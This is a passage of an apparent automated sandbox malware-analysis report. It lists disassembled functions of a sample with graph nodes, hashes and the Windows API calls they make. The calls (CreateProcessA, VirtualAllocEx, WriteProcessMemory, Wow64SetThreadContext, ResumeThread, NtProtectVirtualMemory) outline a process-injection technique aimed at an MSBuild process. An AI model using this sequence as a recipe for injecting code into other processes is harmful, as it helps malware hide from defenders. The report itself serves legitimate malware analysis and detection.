124->127 125->124 126->127 129 5672f54-5672f57 call 5670fc0 126->129 130 5672f62-5672f66 127->130 131 5672f70-5672f74 127->131 129->127 130->131 133 5672f68-5672f6b call 5670fc0 130->133 134 5672f86-5672f8d 131->134 135 5672f76-5672f7c 131->135 133->131 137 5672fa4 134->137 138 5672f8f-5672f9e 134->138 135->134 140 5672fa5 137->140 138->137 140->140
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05672E96
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: a9c4cbb7e19a488913e6329a0de23c9542f3c70f0238943a41f63aec3065e43d
                        • Instruction ID: fcad6f15e1ab5435de67474c253ed9e5c799b1acdae6c3b344febd1046df509e
                        • Opcode Fuzzy Hash: a9c4cbb7e19a488913e6329a0de23c9542f3c70f0238943a41f63aec3065e43d
                        • Instruction Fuzzy Hash: 69916B75D0021D9FEB20CF68C854BEDBBB2BF48310F1481A9E819A7340DB749A85CF91
                        Function 05672AC2 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 141 5672ac2-5672ac5 142 5672ac7-5672ae0 141->142 143 5672ae6 141->143 142->143 144 5672ae7-5672b1f 143->144 145 5672aaf-5672abf 143->145 148 5672b26-5672b55 ReadProcessMemory 144->148 145->141 149 5672b57-5672b5d 148->149 150 5672b5e-5672b8e 148->150 149->150
                        APIs
                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05672B48
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 929f4bb4accb62f32cfd2efd7f5096ea0d4c1e866b27fb36e38ca535f141f31e
                        • Instruction ID: 710932c3724a9aec98f517da743c14f6a65deee02ac13f82b057b0723a7178ae
                        • Opcode Fuzzy Hash: 929f4bb4accb62f32cfd2efd7f5096ea0d4c1e866b27fb36e38ca535f141f31e
                        • Instruction Fuzzy Hash: FB214875C003499FDB20CFA9C841BEEBBF1FF48320F10852AE529A7291C7785905CB61
                        Function 056729D2 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 154 56729d2-5672a26 157 5672a36-5672a75 WriteProcessMemory 154->157 158 5672a28-5672a34 154->158 160 5672a77-5672a7d 157->160 161 5672a7e-5672aae 157->161 158->157 160->161
                        APIs
                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05672A68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 9e8d5f426b285c6fba43e3085ebf96500f438893f466f9b204ade58577104216
                        • Instruction ID: 089d9c423047bf8b0981032f989f7486011e565157d49d190dd7513927924fa0
                        • Opcode Fuzzy Hash: 9e8d5f426b285c6fba43e3085ebf96500f438893f466f9b204ade58577104216
                        • Instruction Fuzzy Hash: 22213375D003499FDB20CFA9C881BEEBBF5FF48310F10842AE919A7241D7789951CBA4
                        Function 056729D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 165 56729d8-5672a26 167 5672a36-5672a75 WriteProcessMemory 165->167 168 5672a28-5672a34 165->168 170 5672a77-5672a7d 167->170 171 5672a7e-5672aae 167->171 168->167 170->171
                        APIs
                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05672A68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: d1c19a033746312aa54d0e35652e61e98ce8c22e3b9837af8abc78426271854e
                        • Instruction ID: 8f0eb8946b30cee24d75cfd302ee76ecb5646b8cd32bcab65fa6aad00ac0f89d
                        • Opcode Fuzzy Hash: d1c19a033746312aa54d0e35652e61e98ce8c22e3b9837af8abc78426271854e
                        • Instruction Fuzzy Hash: E5212575D003599FDB20CFAAC881BEEBBF5FF48310F10842AE919A7240D7789955CBA4
                        Function 05672430 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 175 5672430-5672483 177 5672485-5672491 175->177 178 5672493-56724c3 Wow64SetThreadContext 175->178 177->178 180 56724c5-56724cb 178->180 181 56724cc-56724fc 178->181 180->181
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056724B6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 5ad7ef4c01f140b3811571830f483b20f5ec20974ddf3df5c0e0213f34176642
                        • Instruction ID: 2e0f2974e0fb8b9c7789f41214b3928374ecaa48d2011cb509eb0bdb6964d3b8
                        • Opcode Fuzzy Hash: 5ad7ef4c01f140b3811571830f483b20f5ec20974ddf3df5c0e0213f34176642
                        • Instruction Fuzzy Hash: EA213475D002098FDB20CFAAC485BEEBBF4AF88320F14852DD419A7641D7789945CFA1
                        Function 05672438 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 185 5672438-5672483 187 5672485-5672491 185->187 188 5672493-56724c3 Wow64SetThreadContext 185->188 187->188 190 56724c5-56724cb 188->190 191 56724cc-56724fc 188->191 190->191
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056724B6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 29d87fa052c3c01b6aae22460af2237f39eb307041803bcb7e6e9aa934a446f2
                        • Instruction ID: 81de6196ee723832395f13513e33c32599e940e92c53d618087656909eae9eb9
                        • Opcode Fuzzy Hash: 29d87fa052c3c01b6aae22460af2237f39eb307041803bcb7e6e9aa934a446f2
                        • Instruction Fuzzy Hash: 09213575D003098FDB20DFAAC485BEEBBF4EF48220F14842AD419A7240CB78A945CFA4
                        Function 05672AC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 195 5672ac8-5672b55 ReadProcessMemory 198 5672b57-5672b5d 195->198 199 5672b5e-5672b8e 195->199 198->199
                        APIs
                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05672B48
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 2602a8a7cf7cacacea293e2cbe8672a62dc3f66355141519207a4fa09ca50975
                        • Instruction ID: 2795fa9274780c1a42ed4e9a9995b6ae0164a1e4547974ba8a23b7a0131cef8c
                        • Opcode Fuzzy Hash: 2602a8a7cf7cacacea293e2cbe8672a62dc3f66355141519207a4fa09ca50975
                        • Instruction Fuzzy Hash: 65210375C003599FDB10CFAAC881BEEBBF5FF48320F10842AE919A7250C7799951CBA4
                        Function 05672912 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 203 5672912-5672993 VirtualAllocEx 206 5672995-567299b 203->206 207 567299c-56729c1 203->207 206->207
                        APIs
                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05672986
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 8655a19939e0f7ca0bbd9ac2efad0eae55f5e3c505d553b18aa92dffa17ebcc3
                        • Instruction ID: 469f1b3708578c9205418fc7294c769f842e877a3efc3bdf01ce5a2516aef007
                        • Opcode Fuzzy Hash: 8655a19939e0f7ca0bbd9ac2efad0eae55f5e3c505d553b18aa92dffa17ebcc3
                        • Instruction Fuzzy Hash: 69113675C002498FDB20DFAAC845BDEBBF5FF88310F248419D515A7250C7759911CFA4
                        Function 05672918 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 219 5672918-5672993 VirtualAllocEx 222 5672995-567299b 219->222 223 567299c-56729c1 219->223 222->223
                        APIs
                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05672986
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 9f0ebb212472a07e09d4bb11ef0a4a55d9dbe74c455535d51cb39e152cb62412
                        • Instruction ID: 262087aa996809aa45815754fc3652a621b1b0f0be3fe8a320d918917e009e95
                        • Opcode Fuzzy Hash: 9f0ebb212472a07e09d4bb11ef0a4a55d9dbe74c455535d51cb39e152cb62412
                        • Instruction Fuzzy Hash: FA112675C003499FDB20DFAAC845BDEFBF5EB88320F148419E519A7250C775A951CFA4
                        Function 05672380 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 211 5672380-56723f7 ResumeThread 214 5672400-5672425 211->214 215 56723f9-56723ff 211->215 215->214
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 5c823091d9b6c9a315a5fa234ce82048b52efa2ed13ee019943be68b241a3c1f
                        • Instruction ID: 5cf507c27d7b152401d31e3070cba0b42f6a1e32a8410ac149c0d7f742df8e25
                        • Opcode Fuzzy Hash: 5c823091d9b6c9a315a5fa234ce82048b52efa2ed13ee019943be68b241a3c1f
                        • Instruction Fuzzy Hash: 72113475C002498FDB20CFAAD845BEEFBF5EB88220F24851DD419A7240C7796945CF95
                        Function 05672388 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 227 5672388-56723f7 ResumeThread 230 5672400-5672425 227->230 231 56723f9-56723ff 227->231 231->230
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: aa688effe3064110e19d42bbdc1c85854999373906dbb9fcb866d0f771e1159d
                        • Instruction ID: 663d1dc8c7f2ec19690be5eaaf2ce4e001e10c9e35f55e69315c9dd575e07b93
                        • Opcode Fuzzy Hash: aa688effe3064110e19d42bbdc1c85854999373906dbb9fcb866d0f771e1159d
                        • Instruction Fuzzy Hash: 1F113675D003498FDB24DFAAC8457DEFBF8EB88224F248419D419A7240CB79A945CBA4
                        Function 0147D4C8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1176174692.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88e6f84c1b6a66cff74a03ca7a78227c050881d55041d096d672507a938d14bf
                        • Instruction ID: c49f1c81375200b426caadaba845aa98b596c2716c4661f924a878623635c791
                        • Opcode Fuzzy Hash: 88e6f84c1b6a66cff74a03ca7a78227c050881d55041d096d672507a938d14bf
                        • Instruction Fuzzy Hash: 50212571910200EFDB15DF54D9C0B57BF66FF88318F24856EE90A0B266C336D456CBA2
                        Function 0147D3DC Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1176174692.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49b2a9d2b14d8ebdf3a90358942edfba132a45fef895969a4aa70e0709978998
                        • Instruction ID: 0d1e8a554f8a9cf48b271df9250b07d57853275c6e396a1718ed1a8057cfa840
                        • Opcode Fuzzy Hash: 49b2a9d2b14d8ebdf3a90358942edfba132a45fef895969a4aa70e0709978998
                        • Instruction Fuzzy Hash: E8213372910204DFDB15DF54D9C0B97BBA6FF88320F20C17AE8090B266C336E456CAA2
                        Function 0147D4C3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1176174692.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                        • Instruction ID: 5f785a368b5b4f7c5e24c8a372cbab11afd03efd0ef52a0685564b8401f443b4
                        • Opcode Fuzzy Hash: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                        • Instruction Fuzzy Hash: 3E11AF76904240CFDB16CF54D9C4B56BF62FB84324F2486AAD8090B266C336D456CBA1
                        Function 0147D3D7 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1176174692.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                        • Instruction ID: 3eabae4832e9356bc841c7c2f813205c07ae55c7cc17fae097fea7901d8428f8
                        • Opcode Fuzzy Hash: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                        • Instruction Fuzzy Hash: 4C11D272804240CFCB06CF44D5C0B56BF62FF84314F24C1AAD8090B666C33AD456CBA1

                        Execution Graph

                        Execution Coverage:15.4%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:100%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 9224 1233ed8 9225 1233f26 NtProtectVirtualMemory 9224->9225 9227 1233f70 9225->9227

                        Executed Functions

                        Function 01239658 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 139 1239658-1239665 140 1239667-1239669 139->140 141 123966e-123967e 139->141 144 123990d-1239914 140->144 142 1239680 141->142 143 1239685-1239695 141->143 142->144 146 12398f4-1239902 143->146 147 123969b-12396a9 143->147 150 1239915-123998e 146->150 152 1239904-1239906 146->152 147->150 151 12396af 147->151 151->150 153 1239740-1239761 151->153 154 12398a7-12398c2 call 1230308 151->154 155 1239766-1239787 151->155 156 12398c4-12398e6 151->156 157 12398e8-12398f2 151->157 158 123984e-1239874 151->158 159 12396cd-12396ee 151->159 160 123978c-12397ad 151->160 161 123980c-1239849 151->161 162 12396f3-1239715 151->162 163 12397b2-12397da 151->163 164 12396b6-12396c8 151->164 165 123971a-123973b 151->165 166 1239879-12398a5 151->166 167 12397df-1239807 151->167 152->144 168 1239908 call 1234e68 152->168 153->144 154->144 155->144 156->144 157->144 158->144 159->144 160->144 161->144 162->144 163->144 164->144 165->144 166->144 167->144 168->144
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: LRq$Xq$$q
                        • API String ID: 0-2170488595
                        • Opcode ID: a75c3d7352e3f0591ac3cf2371eb5f02000a28e07c4b6c3fa8044d8aee546ae3
                        • Instruction ID: 0e8df132d711a5b4aee7c9c40715da8e12c17af116ee8a586b16f88f42f4a201
                        • Opcode Fuzzy Hash: a75c3d7352e3f0591ac3cf2371eb5f02000a28e07c4b6c3fa8044d8aee546ae3
                        • Instruction Fuzzy Hash: 93818E75F102198BDF18AB799C5577EBAB3BFC8300B09842DE457EB384CE7488429B91
                        Function 01233A80 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 457nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 220 1233a80-1233ac4 221 1233ad0-1233ad3 220->221 222 1233ac6-1233ac8 220->222 223 1233e3e-1233e6d 221->223 225 1233ad9-1233afc 221->225 222->223 224 1233ace 222->224 241 1233e74-1233e78 223->241 224->225 228 1233b08-1233b0b 225->228 229 1233afe-1233b00 225->229 228->223 232 1233b11-1233b37 228->232 229->223 231 1233b06 229->231 231->232 235 1233b45-1233b49 232->235 236 1233b39-1233b3d 232->236 235->223 237 1233b4f-1233b5d 235->237 236->223 239 1233b43 236->239 242 1233b5f-1233b6a 237->242 243 1233b6c-1233b74 237->243 239->237 244 1233e85-1233f6e NtProtectVirtualMemory 241->244 245 1233e7a-1233e84 241->245 246 1233b77-1233b79 242->246 243->246 273 1233f70-1233f76 244->273 274 1233f77-1233f9c 244->274 248 1233b85-1233b88 246->248 249 1233b7b-1233b7d 246->249 248->223 251 1233b8e-1233bb1 248->251 249->223 250 1233b83 249->250 250->251 255 1233bb3-1233bb5 251->255 256 1233bbd-1233bc0 251->256 255->223 258 1233bbb 255->258 256->223 257 1233bc6-1233bea 256->257 261 1233bf6-1233bf9 257->261 262 1233bec-1233bee 257->262 258->257 261->223 265 1233bff-1233c20 261->265 262->223 264 1233bf4 262->264 264->265 268 1233c22-1233c24 265->268 269 1233c2c-1233c2f 265->269 268->223 271 1233c2a 268->271 269->223 272 1233c35-1233c59 269->272 271->272 278 1233c65-1233c68 272->278 279 1233c5b-1233c5d 272->279 273->274 278->223 281 1233c6e-1233c92 278->281 279->223 280 1233c63 279->280 280->281 284 1233c94-1233c96 281->284 285 1233c9e-1233ca1 281->285 284->223 286 1233c9c 284->286 285->223 287 1233ca7-1233ccb 285->287 286->287 289 1233cd7-1233cda 287->289 290 1233ccd-1233ccf 287->290 289->223 292 1233ce0-1233cf3 289->292 290->223 291 1233cd5 290->291 291->292 292->241 294 1233cf9-1233d28 292->294 295 1233d34-1233d37 294->295 296 1233d2a-1233d2c 294->296 295->223 298 1233d3d-1233d55 295->298 296->223 297 1233d32 296->297 297->298 300 1233d61-1233d64 298->300 301 1233d57-1233d59 298->301 300->223 303 1233d6a-1233d81 300->303 301->223 302 1233d5f 301->302 302->303 306 1233d87-1233daa 303->306 307 1233e2d-1233e36 303->307 308 1233db6-1233db9 306->308 309 1233dac-1233dae 306->309 307->294 310 1233e3c 307->310 308->223 312 1233dbf-1233def 308->312 309->223 311 1233db4 309->311 310->241 311->312 314 1233df1-1233df3 312->314 315 1233df7-1233dfa 312->315 314->223 316 1233df5 314->316 315->223 317 1233dfc-1233e19 315->317 316->317 319 1233e21-1233e24 317->319 320 1233e1b-1233e1d 317->320 319->223 321 1233e26-1233e2b 319->321 320->223 322 1233e1f 320->322 321->241 322->321
                        APIs
                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 01233F61
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: 4|q
                        • API String ID: 2706961497-612143306
                        • Opcode ID: 2c02115b3b65024aa0aee0b69fc8b245029076680bcf457d7222dd09393f861e
                        • Instruction ID: f2f2577e71a6940727de6d3064940a4f4aa8663acf1df1a0732714791119aa24
                        • Opcode Fuzzy Hash: 2c02115b3b65024aa0aee0b69fc8b245029076680bcf457d7222dd09393f861e
                        • Instruction Fuzzy Hash: 6EE1D9B2F203464BDB14CA7D8C903AEB6E37FC4224F588239E615DB7D5EA74DA014751
                        Function 01233308 Relevance: 3.1, Strings: 2, Instructions: 647COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 429 1233308-123333c 431 1233348-123334b 429->431 432 123333e-1233340 429->432 433 12336b6-12336e5 431->433 435 1233351-1233374 431->435 432->433 434 1233346 432->434 451 12336ec-12336f0 433->451 434->435 438 1233380-1233383 435->438 439 1233376-1233378 435->439 438->433 442 1233389-12333af 438->442 439->433 441 123337e 439->441 441->442 445 12333b1-12333b5 442->445 446 12333bd-12333c1 442->446 445->433 447 12333bb 445->447 446->433 448 12333c7-12333d5 446->448 447->448 454 12333d7-12333e2 448->454 455 12333e4-12333ec 448->455 452 12336f2-12336fc 451->452 453 12336fd-1233824 451->453 598 123382a call 1233740 453->598 599 123382a call 12332f7 453->599 600 123382a call 1233308 453->600 601 123382a call 1233898 453->601 456 12333ef-12333f1 454->456 455->456 458 12333f3-12333f5 456->458 459 12333fd-1233400 456->459 458->433 460 12333fb 458->460 459->433 461 1233406-1233429 459->461 460->461 465 1233435-1233438 461->465 466 123342b-123342d 461->466 465->433 468 123343e-1233462 465->468 466->433 467 1233433 466->467 467->468 471 1233464-1233466 468->471 472 123346e-1233471 468->472 471->433 474 123346c 471->474 472->433 475 1233477-1233498 472->475 474->475 478 12334a4-12334a7 475->478 479 123349a-123349c 475->479 478->433 482 12334ad-12334d1 478->482 479->433 481 12334a2 479->481 481->482 485 12334d3-12334d5 482->485 486 12334dd-12334e0 482->486 485->433 488 12334db 485->488 486->433 489 12334e6-123350a 486->489 488->489 492 1233516-1233519 489->492 493 123350c-123350e 489->493 492->433 496 123351f-1233543 492->496 493->433 495 1233514 493->495 495->496 500 1233545-1233547 496->500 501 123354f-1233552 496->501 500->433 503 123354d 500->503 501->433 502 1233558-123356b 501->502 502->451 506 1233571-12335a0 502->506 503->502 508 12335a2-12335a4 506->508 509 12335ac-12335af 506->509 508->433 511 12335aa 508->511 509->433 512 12335b5-12335cd 509->512 511->512 515 12335d9-12335dc 512->515 516 12335cf-12335d1 512->516 515->433 519 12335e2-12335f9 515->519 516->433 518 12335d7 516->518 517 1233830-1233838 520 1233846-123384a 517->520 521 123383a-123383c 517->521 518->519 531 12336a5-12336ae 519->531 532 12335ff-1233622 519->532 522 1233856-123385d 520->522 523 123384c-1233853 520->523 521->520 525 123388b-12338ab 522->525 526 123385f-1233868 522->526 590 12338ac call 1233740 525->590 591 12338ac call 12332f7 525->591 592 12338ac call 1233308 525->592 593 12338ac call 1233898 525->593 528 1233876-1233888 526->528 529 123386a-123386c 526->529 529->528 531->506 535 12336b4 531->535 533 1233624-1233626 532->533 534 123362e-1233631 532->534 533->433 537 123362c 533->537 534->433 538 1233637-1233667 534->538 535->451 536 12338b2-12338b4 539 12338b6-12338c9 536->539 540 12338d5-1233921 536->540 537->538 543 1233669-123366b 538->543 544 123366f-1233672 538->544 548 12338cf-12338d2 539->548 594 1233923 call 1233740 540->594 595 1233923 call 12332f7 540->595 596 1233923 call 1233308 540->596 597 1233923 call 1233898 540->597 543->433 546 123366d 543->546 544->433 547 1233674-1233691 544->547 546->547 551 1233693-1233695 547->551 552 1233699-123369c 547->552 551->433 554 1233697 551->554 552->433 555 123369e-12336a3 552->555 554->555 555->451 557 1233929-123392b 558 123393b-12339a3 call 12324ac 557->558 559 123392d-123392f 557->559 568 12339a8-12339bf 558->568 560 1233937-123393a 559->560 571 12339c1-12339cc 568->571 572 1233a2a-1233a3d 568->572 575 12339e4-12339fc call 12324bc 571->575 576 12339ce-12339d4 571->576 573 1233a3f-1233a4e 572->573 578 1233a50 573->578 579 1233a58 573->579 585 12339fe-1233a1b call 12325d4 575->585 586 1233a1d-1233a28 575->586 581 12339d6 576->581 582 12339d8-12339da 576->582 578->579 581->575 582->575 585->573 586->571 586->572 590->536 591->536 592->536 593->536 594->557 595->557 596->557 597->557 598->517 599->517 600->517 601->517
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4|q$PHq
                        • API String ID: 0-2459780019
                        • Opcode ID: e5429918352b28494269c38dc6d6913c8b76ca53ce6330a298623a8849a9f650
                        • Instruction ID: 51c77c83165d7aa1524e4cbb5121143e14c569af25253b0a918306a79ac6e36d
                        • Opcode Fuzzy Hash: e5429918352b28494269c38dc6d6913c8b76ca53ce6330a298623a8849a9f650
                        • Instruction Fuzzy Hash: C222B0B1B142064FDB14DA7D8D903AE76A3BFC8220F198239D606DB3D5EE74DE069B41
                        Function 01233ED8 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 680 1233ed8-1233f6e NtProtectVirtualMemory 683 1233f70-1233f76 680->683 684 1233f77-1233f9c 680->684 683->684
                        APIs
                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 01233F61
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: b07329029631676850c774ea48d29ac6e4e38f951f8403d12467c996a9a45dac
                        • Instruction ID: db18e62cebcb800c85bf0bd3d82759970c96b46ac2f65d86d1d0f4663c120776
                        • Opcode Fuzzy Hash: b07329029631676850c774ea48d29ac6e4e38f951f8403d12467c996a9a45dac
                        • Instruction Fuzzy Hash: CF21F2B1D013499FDB10CFAAD880ADEFBF5FF48310F60842AE519A7210C775A911CBA0
                        Function 01238888 Relevance: .3, Instructions: 281COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dbeed697895032b3f03ed21fe5a0aef710942927949350f43e9e515e4d860c67
                        • Instruction ID: 5ec27948fe4dfdaf72afafda24fe571422d467abd56bb8775b352f5acd956b9e
                        • Opcode Fuzzy Hash: dbeed697895032b3f03ed21fe5a0aef710942927949350f43e9e515e4d860c67
